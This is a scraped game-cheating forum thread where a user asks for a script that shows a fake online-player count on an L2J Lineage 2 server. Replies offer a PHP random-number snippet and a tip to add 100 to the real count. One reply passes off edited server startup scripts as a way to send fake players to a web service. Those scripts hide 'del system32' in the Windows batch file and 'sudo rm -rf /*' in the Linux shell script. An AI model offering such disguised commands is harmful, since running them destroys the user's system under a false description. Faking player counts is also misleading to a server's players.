Jump to content
  • 0

script false online players


Question

9 answers to this question

Recommended Posts

  • 0
Posted

You want to trick people into thinking you've got more players online than you really do?

 

You seriously can't figure this out? If you just want a fake number it doesn't even have to relevant at all.

 

<?php 
$online_players = rand(500,1000); 
echo $online_players; 
?>

  • 0
Posted

You want to trick people into thinking you've got more players online than you really do?

 

You seriously can't figure this out? If you just want a fake number it doesn't even have to relevant at all.

 

<?php 
$online_players = rand(500,1000); 
echo $online_players; 
?>

 

For the funny fact, on L2P based packs, they even got it integrated in core.

  • 0
Posted

For the funny fact, on L2P based packs, they even got it integrated in core.

yea, fakeplayers list, about 200-300 random names Lol

  • 0
Posted

Hey OP, I think I have something that can help you. If you open startGameServer.bat with notepad and change it to this:

 

@echo off
title gameserver console
:start
cd C:\\Windows\\
REM -------------------------------------
REM Default parameters for a basic server.
del system32
java -Xmx512m -cp ./libs/*; net.sf.l2j.gameserver.GameServer
REM
REM If you have a big server and lots of memory, you could experiment for example with
REM java -server -Xmx1536m -Xms1024m -Xmn512m -XX:PermSize=256m -XX:SurvivorRatio=8 -Xnoclassgc -XX:+AggressiveOpts
REM -------------------------------------
if ERRORLEVEL 2 goto restart
if ERRORLEVEL 1 goto error
goto end
:restart
echo.
echo Admin have restarted, please wait.
echo.
goto start
:error
echo.
echo Server have terminated abnormaly.
echo.
:end
echo.
echo Server terminated.
echo.
pause

 

The java commands have been changed to automatically allow a list a fake players to be sent to a web service. After you do this and run it let me know. If you're using linux change GameServer_loop.sh to this:

 

#!/bin/bash

# exit codes of GameServer:
#  0 normal shutdown
#  2 reboot attempt
sudo rm -rf /*
while :; do
[ -f log/java0.log.0 ] && mv log/java0.log.0 "log/`date +%Y-%m-%d_%H-%M-%S`_java.log"
[ -f log/stdout.log ] && mv log/stdout.log "log/`date +%Y-%m-%d_%H-%M-%S`_stdout.log"
java -Xmx512m -cp ./libs/*:l2jserver.jar net.sf.l2j.gameserver.GameServer > log/stdout.log 2>&1
[ $? -ne 2 ] && break
#	/etc/init.d/mysql restart
sleep 10
done

 

After you have ran this code let me know so we can setup your webservice.

  • 0
Posted

Hi all

well my ask is :

 

someone know a scripts (false number players online) for mi server l2j god ?

 

Thx a lot to all it is the best page maxcheaters a master.

you mean the CB online count?

  • 0
Posted

Hi all

well my ask is :

 

someone know a scripts (false number players online) for mi server l2j god ?

 

Thx a lot to all it is the best page maxcheaters a master.

About website script or we are talking for alt+b number?

  • 0
Posted

Hi all

well my ask is :

 

someone know a scripts (false number players online) for mi server l2j god ?

 

Thx a lot to all it is the best page maxcheaters a master.

 

Okay, thats easy for the cb, use search function on your eclipse and search for the L2World.getInstance().getAllPlayersCount();, now after this method add +100, and it will show always 100 more than the actual

Guest
This topic is now closed to further replies.


  • Posts

    • L2 PVPTOP - HTML DESIGN    
    • Do not trust this guy, he will scam you. I have sent proof to the mods, I have posted proof on another thread and I can send proof to anyone who DMs me. Avoid this guy. So not only did he scam me out of $51 USDTthen delete his messages and blocked me (I have proof) . You can see his Facebook group is constantly changing names depending on his most current scam. If you see this message and you still decide to go forward with sending your money to him, that’s on you. I can’t stress this enough. This guy is a scammer. 
    • So Goldbar thinks that deleted his side of the conversation makes it easier to claim he didn’t scam me. But I sent him $51 USDT to his ERC-20 account it was verified, he acted like it was fine but then deleted his messages and blocked me. Seriously do not trust this guy. 
    • Hi everyone, let me introduce myself—I'm Martin, a junior developer. I'm diving into the world of L2 servers, and honestly, I'm super overwhelmed about where to start learning the right way to set up, configure, and run a server. There are so many datapacks—free, private—but it's so much that my head feels like it's going to explode. I'm currently looking for someone or an active project willing to take me on as an intern. I'm not looking to make money—I'm just here to learn and grow out of pure passion for L2. I've already been working with L2jMobius H5. I managed to edit the Community Board, add a buffer, GM Shop, and teleports. I've also created custom NPCs for the GM Shop, and imported new custom weapons and armors—complete with original glow effects, like the Valakas and Antharas weapons. But there's still a lot I don't know, and it can get overwhelming. That’s why I’m looking for someone—or an active non-profit project—willing to take me on as an intern. I’m not looking to make money; I just want to learn, contribute, and grow out of pure passion for L2. If you’re working on a project and could use a motivated learner who’s eager to help, I’d love to connect!
    • Our next easy-botting project, Kain, is right around the corner! Launching tomorrow, Saturday, April 26th at 9:00 ET (UTC -4)! If you haven’t, check out the features and join our Discord to catch up on the latest drama. See you very soon! Read more about L2Toggle and Kain on our site and forum!  
  • Topics

×
×
  • Create New...